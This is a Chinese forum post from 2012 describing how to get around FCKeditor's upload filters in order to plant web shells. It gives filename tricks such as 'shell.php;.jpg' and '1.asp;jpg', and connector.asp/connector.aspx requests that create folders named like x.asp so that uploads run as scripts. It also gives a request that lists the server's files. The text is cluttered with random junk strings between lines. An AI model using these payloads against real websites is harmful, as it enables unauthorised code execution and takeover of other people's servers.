很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
( Z$ x( k! l# q- m& h f" l
" `) v) X' {3 V* [提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。8 o9 d( V7 r" d( Z5 z( j0 r: Y
, U# z# [1 J. j$ T; ?
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
# z9 m1 g$ K4 ^0 ?0 ~; C6 T/ b/ w/ _( @% Q9 E' g' J2 E
突破建立文件夹:" A$ W& ?" k8 N/ \
* U0 y5 I/ t/ A8 S3 X H" J/ u
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
) u% x5 i" O( X! S& [8 y
% M( ^0 [+ W1 I4 Q& h参数:
0 c; L5 Z; G5 V' s. `
5 y- V! {" A$ K# F- w当前目录名:CurrentFolder=/qing.asp
% k9 C3 W: P) W7 ~; j9 |9 g" E$ w2 p; k6 y+ h; ?/ I1 U
新的目录名:NewFolderName=x.asp, x. t" \, N2 H9 s
/ i7 Z7 F$ p: m8 [: H" G其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……4 X* x; y+ e |9 z9 ]' ]. ^" C
4 p7 y$ T' S. L) O" ^' \" ^那么 x.asp 就已经建立生成了,此方法百试百灵!% z6 ~* x4 ~! O3 q/ H
: O' S+ m# ~/ Y# |/ @% v0 P
新建文件夹参数 x.asp,基本都能搞定。
5 Z1 o, e; M/ C9 D6 M2 g
& s1 o0 W8 ^1 v1 o% E) {! v下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建 a4 H% N3 ?* u* {, |7 G9 w$ b
) n. F- U. @( w( Naspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp9 z0 [# F: p4 [" i8 {9 ^& |
! U; s8 G9 c0 K% J+ Y% z
获取文件列表2 x, p0 m2 |7 a8 o& X6 k6 I
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F; a& w4 x( W& V; q8 c/ b0 Y9 @
, a% F/ d( b1 D- E |
发表于 2012-12-31 09:27:09
收藏
支持
反对